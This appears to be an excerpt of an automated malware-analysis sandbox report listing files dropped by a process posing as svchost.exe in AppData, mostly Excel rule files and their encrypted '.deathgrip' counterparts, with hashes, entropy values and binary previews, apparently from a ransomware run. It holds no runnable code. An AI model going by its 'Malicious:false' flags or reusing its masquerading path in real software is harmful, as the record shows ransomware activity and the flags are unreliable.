                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100085v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):784
                                                          Entropy (8bit):7.393984883023864
                                                          Encrypted:false
                                                          SSDEEP:24:zN3sfQf9GbUAcVc2zSlQSRvhVsSun5fwiIaxTQM:zGQ6Umbv+RwcD
                                                          MD5:54AE032F0F497FC797254351545519C9
                                                          SHA1:757F4F7A046031C301D3E4E09697AAFC525D7793
                                                          SHA-256:754DFADFE5D78C1E71E33DE65BF4AABF9ABF79EBB3693354623B0FA67479D56D
                                                          SHA-512:4085100AA5532A4ACE0CA072DE525ADD295D41F066FE66E3B67727FA5CF6BED98730BF70791E2359C20F8F5CCCBCCF66D4A2E1EC8D73132225334A6ACF4FEDDF
                                                          Malicious:false
                                                          Preview:.........z.GQ..0.......%}..........&.._.r.]1.6z%{lC6.._...y...;...2.....`Tk..9..Y..ck.zAaF.. _.aN.8..Q9Q.7..b~r|8P..0lQ.....1.$>.....Z.......8..1`..)......&&O.-.....0....). ...o4.A......GR.^..n.\4.....d.....<..........\..(.c.f-...1.-.rVzqZ6a(.9...c..F..p.....Q..A*......g.T&.....7C.CWx......`.%G....7..E...~......>.Da....-p..?Q./...x>$.#B.......W.-I....CM2..$(6...Fa.iJF:.J..7...X.pkP....m..a..e.7M...R......t..p.^..x0fIfu2c0Lxvh9NLphlfEdphfoohJYdntKOMNNeep8xB/adpD5jzmr+AzPZ9jwhgVsaafubtejb/3B9lLfTuWUegyd5VD6ACp09lMKpsZlOQCmfPQyqekitXRPW6IAV2f27+I2yjpYa9+O/GHdZqyY09d1DKiBPCn7dNe3X2EOc3LjNjxoZyEuJN/z8Z9rNPB+z98EqPISYFaUM0hqEBgNqc5lI8z1qCVrlvBSFBj8E6FH/OPZDqvNZy7UbdGZ/GMrryoGB6bIoSxdtsQTkx5/xkgAdm0C9yU0zmo5gUZMCYhVWIsYaB0F0VfdJqwz1OUcLTHXqdSuzrYHuRT01P9w==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100094v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100094v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.442717468180738
                                                          Encrypted:false
                                                          SSDEEP:24:nlmmt3DmH/u4tlOI+y4Fz5EY5afDcQKHiU0bT:nFt3KfBp+y0zJ4q10P
                                                          MD5:BB2D7BDA0F1631C233E35849823D9B7C
                                                          SHA1:A1757EC3AF380B50788633CF451C290C2C291CEE
                                                          SHA-256:2551762693214AB391A5C4C1A877DC26E606986286572B9DD9AD2D4A137ECA6A
                                                          SHA-512:51B6AA75F4B52B160FA74118F85CA09A075DFF072F9BFE247ADE6945F47754EF575BF0D87A5A7DCEBBC32543F499FAE3809F8ED2992BF766DA947DF72EC4B66F
                                                          Malicious:false
                                                          Preview:........x.:.W.r.R>...[[...H....i.$..+.......st./..-B....t....q.*...E...9N.....C.=...Q..{....6...1.....P..*.to.R.?2...3...~......|w.SX....H..r4..+.28.........\`.)ZZ..O..X.I%...I-`..{S...........4'...ci.kL1.......vy..i....1=...v.?....z<.g..&.p>,....<^......_......\|r..n.3..AS..I>..V..o..L.X.f..z.....Z WL..._.,k(..M52.!.6.ys.@..^PSWO.Y.Y.*..x(r~...C(..H\`.~r*.=J^.Z*/..<W...wV..e..(.|.D.zM.W......`D..l.;+....x...e0..7.J.t....FGo0m..l..8;..L...@..byu..BbMOzI/cK4GbbptLnFirOD9lBX/us58FZWzsaqxqahGVzsW2lm4kQzwErbsUbGWjdVVNv/lNwd25nDl/9nPYDrlGXFxHc4vCPr56AFUjj9P3sVELEXof9H2Whg9BhMqNbgBVu+Jz3wh/Yiv0T5QLzQlejanVE+iq68cCec1rYGe+8oWBS6+KQwNE7gzSE2Pu8vFEHsytdoxGsFIBR+NhM38GvOz/BGfhyli+F5BSV4/A9oldJZ5+Cs9JT2bn+9uNQgaUDFUrzrZFi9RvmoMXUWxDl8FAQM/PeTqyDjOa9Z/U41BnCDZw6OEKGTH7utYVg2g8KlFXldnGMb5Z8gNjug==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule1000v5.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule1000v5.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1952
                                                          Entropy (8bit):7.845399837193608
                                                          Encrypted:false
                                                          SSDEEP:48:eXciXyOqT2hsSVYVZJqV/LeWgc0XJiY93d6zpVO2E8D:ipyX2hsvJM/L9gJJiYZd6zpVOOD
                                                          MD5:E3FC1ECBB2888672101A1F59251144E8
                                                          SHA1:456EB84D9EDBD671CB8CA56D72E5A1C215A16D2E
                                                          SHA-256:75227BF0D8310A0EB260E7937E87D6A2C10EB455A38B0F5B2A0F747485C9B465
                                                          SHA-512:66AA5836DFAEC57604C6C6F36AAD84E00098A6B8D18B5AD5834973A52B413F4816B10EE8B4C22803E7D1E0209F130926549EEEF8E16109248FABB2D37384ABCC
                                                          Malicious:false
                                                          Preview:........1..../0L...4.h..)..TJ....T...C....b...ts&.._C.Tzd.p.....C..F......2......)..U.u..:...0...(....'....%.I<..*.....f&..*t7...'6.....>.E......W.!..:.A;....j.......A.n...D$7............}.1...~..Q.lX....]..qL..j@..)..$./.E.. .R..`...."......\/..}......B./...R;..J(...5.M........6.2.aR!g..\."....v^......_...V .F."...0=Q4.QB..T..p...q.........Ge....0.....K=D..irw..j...........c...:.\..bc......G!.7...`.vQ..ag..i..F.C...|.x.....i...^.......Nr.5...A.YR.}..n.u...p.(. &.T;.]...3.`...\.s...|...'..M./.x......Wl.H....&l3.....U.V*....$w=.|...P..&...,.}.2:A%5aCE<.....',.J..j.g]1r5.. ..,}^....a...>..2.......v..z.)H..~......&....Y.Y..[..D.!HN...R.@O.!.j..R?h...k....._..gBc.N..>.u:n+.7.u..Q~h&?).L......F.x..o]...}%&.x.u..9.`....h....bn2.."&.<MN.!..gw....z...Q;...I..N.).x..4.nR.g.C&..]7...3l.jY.7.@]..2Q.......B.:.....w....C.V..J..t.....,.O..$@q.b.h.,.&..K...9-_.....a.8d=...ql.*....#....P..>..c(.......x.6..L.N2...=.......U.......icU..,.:.ML..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100104v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100104v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1312
                                                          Entropy (8bit):7.735564928204312
                                                          Encrypted:false
                                                          SSDEEP:24:oKco4yoABEHiIvuvwfrZvtoKVaF3iXQqL97x/QXcKfaEIuS6Babk9iHghdm+3r5K:oKuhABECfYDZ1JVaF3+97wDaQxa49pbG
                                                          MD5:580EB47C03F7803915EFC2C5FC11C260
                                                          SHA1:45A0576CA12781E7C2BC33F12E70A8C9014A61EC
                                                          SHA-256:CE136590B1F9CD633A61F3EBB585E8C52D0B75E00251CA63D9935A3AFDADEC1E
                                                          SHA-512:C8A04C6A296C35707DD2F1ADBBF20A1FF76FBF3DDD36644012397F35AE1705C339BCA083AB965FF0CA2F9A1F30E31C48273A8D88784C05AE11452DF5A4A96087
                                                          Malicious:false
                                                          Preview:...........X.W...j.(..X....F.g;/...=.JjW.'.1.O.....'a8..+^.`<.#.\O..6'..d0..zo..<`.M;?x.1..%F..Y~..7..$6{.1....v...0.^..$..^....|8..%)%.X..Z...hA.|...\[..m.....t..MA.......B-.A......_..U..5/...7.;..j!H.....c......$.[Q0..E...+.@.dC .>v..f.q.O.dI...Y.j@CH.#.0.yt...-^.&...9..Q#...";....g......)..B`..].}c/.......21<8..9...QQ`.y.@2.D8g.:B1.[\...\i;.FL...9I......M....In5.Y[-..H'.t..lliA.+Xr....g...a'...+...Z..U.........`....u.*.V.Q.....n..[.O..Y..5.k....._0...V.\.\.,.c.(.$._..#Z...T..m....3-..|.,..C.M..L..1J..w.)...m.....Q....M.a.....h....+..7....L.(.. .!.F..lW..Q.a.`w...@..U.....m.....3....m..p.F...QZ[Y.T.WvQ.....:.?......C.....#.[x..sF..d...sE.f.|d......`z.5.^.~.N....."..p...s....8.T.... \...-...+.h...M.....7.....B......&.....L<y.).W.p.[.....t....F...YM.[S..4..w%..Y1..a.Rr.........n4.v._y?<...........8..? ..N...^!..9&........)[.c.....*.3...LV..7m..z.EA.c..9.....b...R.....f..*N.s.:~l./.W(.bO.g0P.[....F....r.cap.v.).rFMiILGs3V4wHKr+h3jmZSE7hXftI+Iy

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100105v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100105v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1200
                                                          Entropy (8bit):7.67053843528927
                                                          Encrypted:false
                                                          SSDEEP:24:umFPeZVCrw/eeWDnyvPk75KH5oS4BqhICzLzXfsYKP8EZ+8n2xG:1RaC8meWDyvEYoBQ/Lzf/KP/Z+8n2xG
                                                          MD5:4D11EF8E9DD897B218A98030814ADE4D
                                                          SHA1:9317F694014730C5BE6564DB7255C57172A489C2
                                                          SHA-256:7EC15FB8FA2824D054735680880EA5F85BCAF599A6FFB1CBDBE6E3EA61D8BCD3
                                                          SHA-512:9DDBF301B05B9A68B1C9BE50AFE63E9C4512F406C3C803580B2134E9079CB10F311CF273D3166F08E7805BA5EC23E171A1F6ADB126B6FD7FEF7108151FB08587
                                                          Malicious:false
                                                          Preview:...........d.....JLr..,Q...gE..........5..e...k.....{.X.#.R....N...1.+-.{.....4.P".'......O.k..c..30...Ce(.:yX..G.2eddO.a.].$.........C.!.....h........yWM.oF.......".Ed...n>.|.bI..~).....2..2......`.(.1'..-I0..e...X..OW....-..K.jm...`.F<D=. .X.].K..+.......\....Z.me9.<....I..%.A.f....z..9.e..&\a.O....4"....v..$.......'.M..+N.X4n....J>2...1S@h.}..&.rx0..t.J.a..Cv]_F..X.F6...7UQ.'..L...01.M.~f4vG8.~)`V.ZJ.;........y.JF.u....uP.r.d......_.y.Q...&..o...q9.f..,0..<].7.*.bex...Q'.W..,.....a..s.&..,..BVHN..ra.fx...7...`......Oe. .A...d...ooA.nZ....SMN.S..F$.ny4J.-!+....]......mO..-......<.e..$.8..C.m..>.f.e..>.q~...!...q...7......z_o\...sbAf'BR..A..Q.{.CB.z0.........] l...x.4.U.p.....!.S.....9..8ZN....Nw:Bixv.8...T.P.+..<.f..5........UR4...OD.E8.M..0|.7..z_}...N.<.S..u.......3...c.hfT..C.V...9.k...Q.Ka..p......\%..>DqggokQO1Zen4FuFGy7DgbufUupmSPhzTrCTG1iVLWXMGfAYlBJ1NGpWu5KJdg9vyr64RTfDBOhuiapUZTDOZ5gEiiY2nVddoWjla7/eUTiHizJEC3nFU3pgSzUt9zsvtJPfs1uT1EsxiP4T

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100106v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100106v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1408
                                                          Entropy (8bit):7.741513376049114
                                                          Encrypted:false
                                                          SSDEEP:24:Q1wYDyNY97L7NlCp2LUjVAjmnK4BH6gfeXgic4sag8ddEnbdpK:Q1/yNY9DNUp2L96KAagSgOBjrmRA
                                                          MD5:27748BCEA3B0D14C24F2DADA55E72E2B
                                                          SHA1:AE1C92EF20B0207556797455CF88C63164543030
                                                          SHA-256:1C3C61CE24E0620CE6E6056E45A099D915EB3177F53BAF0B82E1D2AA33BA5452
                                                          SHA-512:298A4644CD8364F0F9B4785752EAD59DDF0DA2384FB39532F19166180863DA30C044751D315EE6C544D73893E87BA6FCE85B71668B24D1EA8466F6DEDF5DD757
                                                          Malicious:false
                                                          Preview:..........>E.-....:&....5o.X.C0.....*...*Q.....>.....-....]..;e.m.t.r.{+Uz.+..L*.8..f..........h...5....\.g<:..Bj..D.:e....6O......./...R.&:d .wyW...j.%.)#.1.'..gt..-.D.oOK=.@...r,..QU]..,...~P0d<rzi..D.......U..%.z6..7F:.._.T.0..>...v\......=....[..V....*.\....Ru...".9U.....+.|n_<...d?.......;.Y^...6T..9.?..P.I........U........Q..=.........}5a.+...P_r7."M'.d)....m.....H,.K._J<lC..9V..x'.?r.ag....*..8....F...........?.v...E....Va..T...C...|......*0..):.k.w..Hw..........k...+.l$`.@L.=DC.F.ID..Iu.w$./.D....:..........".@..P........ .#...0...}4....?..4i..v.;P.#.:.Z.&.a.}..... ..e,..x/.......ev..'} .#wF.:&.*<k.d.*...8k+{...6..C{v..~.~>.~...s}.....h}3..P}.s.|N..W....R).Ux....r.o^E.]...:...YGk...../.MTi..g.L.....g%@.zx..ze..#..r.N......Kz..+I[wk0.M.....+..J...<..&.F.9..2....z9...S.rG)P..r.....]L........yYn.jg.....7....u.J........eY$..yj....M..=m.i..^.~.=.)A.V.M$....h...-..6..mz./veE_xM..t...'...#.<B..L...Gz..{.zc.. ..V...;.../.@..R..X

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100109v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100109v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):912
                                                          Entropy (8bit):7.564374888594902
                                                          Encrypted:false
                                                          SSDEEP:12:CxL4lVElTFt1r/LZKoRL8EF9HqSvQ+/3E+ASApg4Z+HCRBu/D1BpVVSuirm/+CPf:BlGpFHPnVlV3BAbgFJ/5xVSuiCWUDz
                                                          MD5:D1F7E5D85880AB7870771F70051D359A
                                                          SHA1:AD75047F705FF6B85A7C3228F5A1FA552BDD470A
                                                          SHA-256:BF68FE76889CFBD540D2F8B4E291E4239B9CFD8A0893A4728885F2EB0C863393
                                                          SHA-512:0C36C96AD477C781CCB3AE4D581C53545E6E8711AD6A1684184BE5CD616BED3C5BAFEAD64B55332A0BFC049FDB26387F5B8A9FEF6F61F6BA8C6FD985E0F9FB35
                                                          Malicious:false
                                                          Preview:...........k.:..T...C....DL..k.....2.....\..&...C._.t...Y\..V...h%.5.Am.[>...m...<....Z...C.k...........~.M./.M..NA.h......&...>..7.....p.. ~....Y5...........).{. 4.Wq..3.. ...p....[d>.).4@._.....Y,..|.X..R...J5t.%.......U\.>..g.y$wq7u.S.....B.(/..`.y1&S....C.{.J.....\.r.#.xa...k~.g;N.Q......7.oO.p%..x.~xG.,.V.n.0..my(.*}.....?......."..cs.x.....b....C.p..o......z.1.R...`.'.t,..go.C..b......^.1i.b$..P...RN3m.]...|..F.-C.D3.*....X^O...Gl^..\......'..tZW7...R.._.@....h.....a.6f..".Q9znB@W..H...7.Y...D...mE+}..oX..<2C./o...u..q.ZO.sDZfmhQitW4CZTMxwKhcEYrRdZ2HbrwxWGk1tQbIxWGPKI7q+8pxEUf20Af+tOCl9KQMavI5nkrpNpD7+O/HETGXti+X4Nq3xAR9U+OkfqlTKAa8BjDEFpAJuoZ4QXFy8blvEbkgYUR3MEEgqESRez2K+AV90g4loUcPea8ug6mlj7fjQUz/sVFk2Uwg5USQUHRto1SiqnaNgDA0Mlu3e8Z0XgFQwJ0qrvZLCZsFxk5xQ5z4+uDKaZRFtcd4AfSR2DSjky+tNwGnmx2T/EQwaiJ7fuB1eisFXxhD7s0M4GXiPZW2SN6y8n40JL4owlmRM3nfJAtSmuyiC8+cNXmaPw==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100110v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100110v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.4331572522175255
                                                          Encrypted:false
                                                          SSDEEP:24:JssMAhZLffW4aJmMQv23h191GnHK8NsEfPSBIz/90Pf:vLffWTcu3h1Pg9yaS8/aPf
                                                          MD5:0717BA019F2904554C6712A235AA5202
                                                          SHA1:6802425149F0D41C55865F270F4CF17C55501F9F
                                                          SHA-256:A2530880E6FCCA1581F20276C700DCDEB30E0489038FC55F2136488A6C9AB429
                                                          SHA-512:EB49DFEAF8068FABC122A960300273DAA920C46E1A53F429506980FE69C1D66B50E1FADD63D899124F29CAD861DBBB333E4984C641FCFCCDCA81409E0FD3E25E
                                                          Malicious:false
                                                          Preview:........c.>..\.Y-....,#.....".^)|.....5ZL...1.h.}..u-R.I,u/.9.=.V.U....."..#.$e.EL...b.o.....v...'..9.._.`.M...-I.....We..k.qp......M}Xy.SiR..7jO...o../..Jjx.....5...M.....6..f.j....>7...N.+y.1!..w7...%U0...)....".6...l$.,|....%.h....V..A....MZMmg..i..7!.#.....j...e.........$:...5....8....^p...y.....L.V`.).......%..3.uR..y.5.>.....*6.....+.N...6.l.....Za...qA...=.D.)$.`y4A...u.a/6y.../.0...m*.*).:..L_..........0.....b....J).E.Qa.m.}.....6 .bZ0DEppFvR/WB9WSc0+ZP9TzXxuZLb5FlU9u2llDIAZdC7Ga6tD8YtsQxs8Ydd9EtgLdFUTXztLP47+l++ezfFGNZ7NnqOtQcaC+YDoJSygpvMUkbZaxKJDmtYBax8RosVDqap0Hcy4mrZGR3b32PBdHy2n2hAbcqVNPbI0JBgaIm8hawb53bCXJ5Bb6iVmuYOlSvcYMpMS7eXIdTvTOfEZqKplvh7VxNXZNwgNOMZL8eTdxl8j2ivmAkQZq5TyW/yr0cp6rxd5nEOo4OGlfR1CuxS+ZXRj199ytJ9nDwaPhc1E4nozaLwSjlGvjnEveXodCT+zaYO9CAfk9fVDh8ow==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100113v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100113v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.434101513824242
                                                          Encrypted:false
                                                          SSDEEP:12:VCZRF5yAhVuUsTW2oZCWnFgouMiOI7ixgcoulAuCxv/6d20d2qnT5341/L9yqB9p:+Vs3UCWt/i+otv/6d2qnTpWJyqLbFb
                                                          MD5:20789D250A449AE08297DB324606BB77
                                                          SHA1:108788436F6585A31FCADDA955DB3FE8A40BDDBD
                                                          SHA-256:71D9150B562F88957DD276566C6CC5B399B03D1982566779F12FFBCC1684B2D9
                                                          SHA-512:0EDE2EC689F725AE39F20921053A7ABD2E9C10A3BAFC48D021EE870EA31B553D07B4A5FA5FF3C56AB84619313E303AA4211BF5A718A8236BE28A1C0073381C41
                                                          Malicious:false
                                                          Preview:...........|.'.Q.j.b.Ho.`]..W.....k....2...K.|'..A.86).\..S.Ng[.,.....'..:...L........U_E.d.H.S..C..M..>.AL)..j/.7\4....w`==..<.N[m.P.....?.Cm$B.........cxu......F.q.i......j....o&y..f...O...*.P~[..tO.w.<..!#.F.y......`*&Z.i......cJ.H...b;y.......F(D.u...T|...G.......l.7.k.f.xujU..mk.[.9.6.5v...v....~+.p...!.7....^.T.lb..$=...+iu...3n..9..o..W...._....@.b...$8 ...#........r1T.ZjB..!.2.f."...'gS.6...:.2.KF.....".e6....?.../...=.K.....A..2{..mFTkIj9Gtjp3ocGvd1g58JcYfcC1pO8JXOo3tYKpM25vQeMAGba9zGY/3ziMMmlp8P73se7jkJz8e7mN8AErfj4w27iqP/NUn7dqZHt01ciGkef3oHDv+5SqaGX7/XdyOgaBE6gE7QMjncEpvRh3KC3OnwcZsrsNZVAK27sZXfga4ZLGLYxImt2wIEH8oTEoynH+i6FD7E4Y0LKFwPLIt3rEY6NpRLmjZu0zgnLQQ4S7PeDRPJ+oN1CfCchZ8gBEyCC4ZngSppu8sc3p+CvCOUmB9vzxeopGVTqMIrB0Gqrb1ZFu2btUlnZmDiC/ZIyj/wCRcFPZKc6G02lgGV1rVg==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120600v4.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120601v3.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3696
